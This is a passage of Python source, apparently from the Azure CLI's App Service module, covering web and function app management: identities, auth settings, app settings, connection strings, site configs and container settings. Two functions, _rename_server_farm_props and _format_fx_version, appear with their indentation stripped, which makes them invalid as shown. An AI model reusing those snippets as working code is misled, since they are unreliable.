    dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
    if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
        raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                              general_switch_msg)
    if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
        raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
                              'Elastic Premium plan. ' +
                              general_switch_msg)
    # Premium -> Consumption can lose features: warn, and require --force.
    if src_is_premium and dest_is_consumption:
        logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
                       'functionality and cause the app to break. Please ensure the functionapp is compatible '
                       'with a Consumption plan and is not using any features only available in Premium.')
        if not force:
            raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
                                              'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Create-or-update a function app from a full site envelope (generic updater hook).

    :raises ValidationError: when the envelope does not describe a function app.
    """
    instance = kwargs['parameters']
    if 'function' not in instance.kind:
        raise ValidationError('Not a function app to update')
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    return web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
    """List web apps (function apps excluded) in the subscription or resource group."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' not in app.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List deleted apps matching the filters, ordered by deleted-site id."""
    deleted = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    deleted.sort(key=lambda site: site.deleted_site_id)
    return deleted
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a previously deleted app into the given site/slot.

    Configuration is recovered unless *restore_content_only* is truthy.
    """
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    recover_config = not restore_content_only
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id,
                                       recover_configuration=recover_config)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List only function apps in the subscription or resource group."""
    all_apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in all_apps if 'function' in app.kind]
def _list_app(cli_ctx, resource_group_name=None):
    """Enumerate sites (optionally scoped to a resource group) with renamed plan props."""
    client = web_client_factory(cli_ctx)
    if resource_group_name:
        pages = client.web_apps.list_by_resource_group(resource_group_name)
    else:
        pages = client.web_apps.list()
    apps = list(pages)
    for app in apps:
        _rename_server_farm_props(app)
    return apps
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect deleted apps across all supported locations, then apply the filters."""
    client = web_client_factory(cli_ctx)
    deleted = []
    for location in _get_deleted_apps_locations(cli_ctx):
        deleted.extend(client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        deleted = [d for d in deleted if d.resource_group == resource_group_name]
    if name:
        wanted_name = name.lower()
        deleted = [d for d in deleted if d.deleted_site_name.lower() == wanted_name]
    if slot:
        wanted_slot = slot.lower()
        deleted = [d for d in deleted if d.slot.lower() == wanted_slot]
    return deleted
def _build_identities_info(identities):
    """Normalize a raw identity list into (payload dict, type string, external ids, system flag).

    The MSI_LOCAL_ID sentinel (or an empty/None list) selects the system-assigned
    identity; every other entry is treated as a user-assigned identity resource id.
    """
    from ._appservice_utils import MSI_LOCAL_ID
    requested = identities or []
    types = []
    if not requested or MSI_LOCAL_ID in requested:
        types.append('SystemAssigned')
    external = [identity for identity in requested if identity != MSI_LOCAL_ID]
    if external:
        types.append('UserAssigned')
    type_string = ','.join(types)
    payload = {'type': type_string}
    if external:
        payload['userAssignedIdentities'] = {identity: {} for identity in external}
    return (payload, type_string, external, 'SystemAssigned' in type_string)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Enable managed identity on a web app.

    assign_identities: user-assigned identity resource ids; the MSI_LOCAL_ID
    sentinel (or an empty list) requests the system-assigned identity.
    role/scope: forwarded to the core assign_identity helper, which can create
    an RBAC role assignment for the identity.
    Returns the app's resulting identity object.
    """
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        # Merge the requested identity kind(s) with whatever the app already has;
        # once both kinds are present (existing or being added), the combined type wins.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned
        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            # attach each requested user-assigned identity to the site
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Show the managed identity attached to the app (or slot)."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Disable managed identities on a web app.

    remove_identities: user-assigned identity ids to detach; the MSI_LOCAL_ID
    sentinel (or an empty list) removes the system-assigned identity instead.
    Returns the app's resulting identity object.
    """
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        if webapp.identity is None:
            # nothing to remove
            return webapp
        to_remove = []
        # identity ids are compared case-insensitively throughout
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            if not list(existing_identities - to_remove):
                # every user-assigned identity is going away; downgrade the type
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            # drop the system-assigned part, keeping user-assigned if still present
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
                                    else IdentityType.user_assigned)
        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            # user-assigned identities remain: rebuild the map minus the removed ids
            webapp.identity.user_assigned_identities = {}
            if to_remove:
                for identity in list(existing_identities - to_remove):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
            else:
                for identity in list(existing_identities):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Fetch the app's authentication/authorization (Easy Auth) settings."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
    """Validate an auth runtime version: None, '~<int>', or a three-part numeric version."""
    def _is_int(text):
        # int() is used (not str.isdigit) to match the accepted formats exactly
        try:
            int(text)
        except ValueError:
            return False
        return True

    if runtime_version is None:
        return True
    if runtime_version.startswith("~") and len(runtime_version) > 1:
        return _is_int(runtime_version[1:])
    parts = runtime_version.split('.')
    return len(parts) == 3 and all(_is_int(part) for part in parts)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update the app's Easy Auth settings.

    Parameter names intentionally mirror SiteAuthSettings attributes: they are
    copied onto the settings object reflectively below, so renaming a parameter
    requires adjusting the reflection logic.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        # any other action means "redirect to login" with that provider as default
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')
    import inspect
    frame = inspect.currentframe()
    # these flags arrive as 'true'/'false' strings and must be converted to bool
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # copy every supplied argument (skipping cmd and resource_group_name) onto
    # the settings object
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
    """List app instances, pinned to API 2018-02-01 (2019-08-01 omits slot instances)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
                                   api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
    """Query the live stacks API for the supported runtime display names."""
    client = web_client_factory(cmd.cli_ctx)
    helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
    return [stack['displayName'] for stack in helper.stacks]
def list_runtimes_hardcoded(linux=False):
    """Return runtime display names from the bundled RUNTIME_STACKS json file."""
    stacks = get_file_json(RUNTIME_STACKS)
    platform_key = 'linux' if linux else 'windows'
    return [stack['displayName'] for stack in stacks[platform_key]]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):
    """Delete a web app (or one slot), optionally preserving metrics, plan or DNS registration.

    Passing None for a delete option lets the service apply its default behavior;
    False explicitly suppresses that deletion step.
    """
    client = web_client_factory(cmd.cli_ctx)
    delete_options = {
        'delete_metrics': False if keep_metrics else None,
        'delete_empty_server_farm': False if keep_empty_plan else None,
        'skip_dns_registration': False if keep_dns_registration else None,
    }
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot, **delete_options)
    else:
        client.web_apps.delete(resource_group_name, name, **delete_options)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop the web app (or the specified deployment slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start the web app (or the specified deployment slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart the web app (or the specified deployment slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Fetch the site configuration resource for the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings as a list of {name, value, slotSetting} dicts."""
    settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(settings.properties, sticky_names)
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    """Check that app settings propagated to the Kudu (SCM) site via its api/settings endpoint.

    should_have: setting names expected to be present.
    should_not_have: setting names expected to be absent.
    should_contain: name->value pairs expected to match exactly.
    Returns True when all supplied expectations hold.
    """
    scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    present_names = set(scm_settings)
    if should_have and not set(should_have) <= present_names:
        return False
    if should_not_have and set(should_not_have) & present_names:
        return False
    # overlaying the expected pairs must not change anything if they already match
    expected = {**scm_settings, **(should_contain or {})}
    return expected == scm_settings
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
    """Fetch the app settings the Kudu (SCM) site actually sees, retrying on failure."""
    import requests
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    request_headers = {
        'Content-Type': 'application/octet-stream',
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent()
    }
    response = requests.get('{}/api/settings'.format(scm_url), headers=request_headers,
                            auth=(username, password), timeout=3)
    return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings as a list of {name, value, type, slotSetting} dicts."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .connection_string_names or []
    return [{'name': key,
             'value': conn_strings.properties[key].value,
             'type': conn_strings.properties[key].type,
             'slotSetting': key in sticky_names} for key in conn_strings.properties]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return the app's Azure storage mounts as {name, value, slotSetting} dicts."""
    client = web_client_factory(cmd.cli_ctx)
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .azure_storage_config_names or []
    return [{'name': key,
             'value': accounts.properties[key],
             'slotSetting': key in sticky_names} for key in accounts.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish URL from the publish profiles onto the webapp object."""
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    # NOTE(review): raises StopIteration if no FTP profile exists — same as before
    ftp_url = next(profile['publishUrl'] for profile in profiles if profile['publishMethod'] == 'FTP')
    setattr(webapp, 'ftpPublishingUrl', ftp_url)
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Set the container image into the linux or windows fx version, per the site's OS flags."""
    image_fx = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    if not web_app:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    linux_fx = image_fx if web_app.reserved else None
    windows_fx = image_fx if web_app.is_xenon else None
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Clear the linux fx version (a single space resets it server-side)."""
    return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return the site's linux or windows fx version, or '' when neither is set."""
    site_config = get_site_configs(cmd, resource_group_name, name, slot)
    return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
    """Return True only if url parses with a scheme, a network location AND a path."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    return all([parts.scheme, parts.netloc, parts.path])
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
    """Base64-decode the config payload of a multi-container fx version."""
    from base64 import b64decode
    linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
    if not any(linux_fx_version.startswith(prefix) for prefix in MULTI_CONTAINER_TYPES):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    encoded_config = linux_fx_version.split('|')[1]
    return b64decode(encoded_config.encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multi-container config from a URL or local path and return it base64-encoded."""
    from base64 import b64encode
    if url_validator(file_name):
        config_file_bytes = urlopen(file_name, context=_ssl_context()).read()
    else:
        with open(file_name, 'rb') as config_file:
            config_file_bytes = config_file.read()
    # encode the raw bytes, then decode the base64 back into a plain string
    return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
                        windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
                        python_version=None, net_framework_version=None,
                        java_version=None, java_container=None, java_container_version=None,
                        remote_debugging_enabled=None, web_sockets_enabled=None,
                        always_on=None, auto_heal_enabled=None,
                        use32_bit_worker_process=None,
                        min_tls_version=None,
                        http20_enabled=None,
                        app_command_line=None,
                        ftps_state=None,
                        generic_configurations=None):
    """Update site configuration.

    Named parameters mirror SiteConfig attributes and are applied reflectively;
    --generic-configurations additionally accepts JSON blobs or KEY=VALUE pairs
    for properties that have no dedicated flag.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
    if linux_fx_version:
        if linux_fx_version.strip().lower().startswith('docker|'):
            # single-container docker sites should not mount the shared content storage
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
    if pre_warmed_instance_count is not None:
        pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
                                                              min_val=0, max_val=20)
    import inspect
    frame = inspect.currentframe()
    # these flags arrive as 'true'/'false' strings and must be converted to bool
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
    int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # copy each supplied named arg (after cmd/resource_group_name/name) onto configs
    for arg in args[3:]:
        if arg in int_flags and values[arg] is not None:
            values[arg] = validate_and_convert_to_int(arg, values[arg])
        if arg != 'generic_configurations' and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    generic_configurations = generic_configurations or []
    # https://github.com/Azure/azure-cli/issues/14857
    updating_ip_security_restrictions = False
    result = {}
    for s in generic_configurations:
        try:
            json_object = get_json_object(s)
            for config_name in json_object:
                if config_name.lower() == 'ip_security_restrictions':
                    updating_ip_security_restrictions = True
            result.update(json_object)
        except CLIError:
            # not JSON: treat the argument as a KEY=VALUE pair
            config_name, value = s.split('=', 1)
            result[config_name] = value
    for config_name, value in result.items():
        if config_name.lower() == 'ip_security_restrictions':
            updating_ip_security_restrictions = True
        setattr(configs, config_name, value)
    if not updating_ip_security_restrictions:
        # avoid round-tripping the restrictions list unless it was explicitly updated (#14857)
        setattr(configs, 'ip_security_restrictions', None)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove app settings by name, also de-registering them from sticky slot settings."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting_name in setting_names:
        app_settings.properties.pop(setting_name, None)
        if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
            slot_cfg_names.app_setting_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one Azure storage mount by id, de-registering it from sticky slot settings."""
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    accounts.properties.pop(custom_id, None)
    sticky_names = slot_cfg_names.azure_storage_config_names
    if sticky_names and custom_id in sticky_names:
        sticky_names.remove(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Return an SSL context for fetching remote config files.

    Falls back to a default-constructed TLS context on very old Pythons, or in
    Cloud Shell on Windows where the default certificate store is unreliable;
    otherwise uses a fully-verified default context.
    """
    import platform
    # BUG FIX: the original called sys.platform.system(), which always raises
    # AttributeError (sys.platform is a str). platform.system() is the intended
    # call; the defect was latent because short-circuiting usually skipped it.
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Convert the raw name->value settings dict into [{name, value, slotSetting}], masking creds."""
    sticky_names = slot_cfg_names or []
    masked = _mask_creds_related_appsettings(app_settings)
    return [{'name': setting,
             'value': app_settings[setting],
             'slotSetting': setting in sticky_names} for setting in masked]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add or update connection strings; slot_settings entries are also made sticky.

    Each entry is NAME=VALUE; a VALUE wrapped in quotes has the quote characters
    stripped. Raises CLIError if neither settings nor slot_settings is given.
    """
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '=', connection string should not have '=' in the name
        conn_string_name, value = name_value.split('=', 1)
        # BUG FIX: guard against an empty value ('NAME='), which previously
        # raised IndexError on value[0]
        if value and value[0] in ["'", '"']:  # strip away the quotes used as separators
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
                                                                            type=connection_string_type)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings.properties, slot, client)
    if slot_settings:
        # register the slot-setting names as sticky so they don't swap with the slot
        new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
        slot_cfg_names.connection_string_names += new_slot_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove connection strings by name, de-registering them from sticky slot settings."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting_name in setting_names:
        conn_strings.properties.pop(setting_name, None)
        if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
            slot_cfg_names.connection_string_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings.properties, slot, client)
# App settings that configure the container a site runs; used by the
# show/update/delete container-settings commands to filter and manage settings.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values are nulled out by _mask_creds_related_appsettings before display.
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update the container (docker) configuration of a web app.

    Registry URL/credentials and the storage toggle are written as app settings;
    the image (or multi-container config) is written into the site fx version.
    Returns the resulting container-related settings with credentials masked.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    # For an ACR registry with no credentials supplied, try to look up the
    # registry's admin credentials on the user's behalf (best effort).
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # the registry name is the first label of the host (or path when no scheme was given)
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex:  # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex)  # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage:  # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
    # re-read so the returned view reflects what was actually stored
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
    if multicontainer_config_file and multicontainer_config_type:
